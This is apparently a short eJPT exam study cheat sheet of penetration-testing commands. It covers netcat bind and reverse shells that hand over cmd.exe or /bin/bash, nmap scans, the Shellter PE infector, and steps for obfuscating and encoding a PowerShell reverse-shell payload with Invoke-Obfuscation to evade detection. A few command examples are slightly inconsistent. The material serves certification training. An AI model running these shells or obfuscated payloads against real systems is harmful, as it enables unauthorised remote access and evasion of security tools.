eJPT-CheatSheets
Bartosz Pokrywka
Usefull info and commands for eJPT cert exam
Can be used for:
- Banner Grabbing
- Port Scanning
- Transfering Files
- Bind/Reverse Shells
Setup listener:
> nc -nvlp <port>
Setup connection:
> nc -nv <IP> <port>
Downside of bind shell is that the firewall will probably block the connection.
Target system:
> .\nc.exe -nvlp <port> -e cmd.exe
Attacker system:
> nc -nv <IP> <port>
OR
Target system:
> nc -nvlp <port> -c /bin/bash
Attacker system:
> .\nc.exe -nv <IP> <port>
Better thing: Attacker (Netcat Listener) <---- Target (Netcat Client)
Target system:
> .\nc.exe -nv <port> -e cmd.exe
Attacker system:
> nc -nvlp 1234
Basic version scan:
> nmap <IP> -sV
10k ports scan:
> nmap <IP> -T4 -PA -sC -sV -p 1-10000 -oX nmap_10k
Scan UDP ports:
> nmap <IP> -sU -sV
Sometimes there's a file:
> phpinfo.php
Look for it...
Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
> https://www.shellterproject.com
> sudo apt install shellter -y
It requires Wine.
> sudo wine shellter.exe
- Invoke-Obfuscation is an open source PowerShell v2.0+ compatible PowerShell command and script obfuscator.
GitHub Repo:
> https://github.com/danielbohannon/Invoke-Obfuscation
On Linux you need to install powershell in this case.
> sudo apt install powershell -y
As the payload use for example:
> https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#powershell
To load it:
> SET SCRIPTPATH /path/to/your/shell.ps1
Choose option like "AST" or anything you like.
There are some options for AST, you can choose ALL ;)
You can also encode it:
> ENCODE
For ASCII choose:
> 1
Then copy the result into the file called like "obfuscated.ps1"...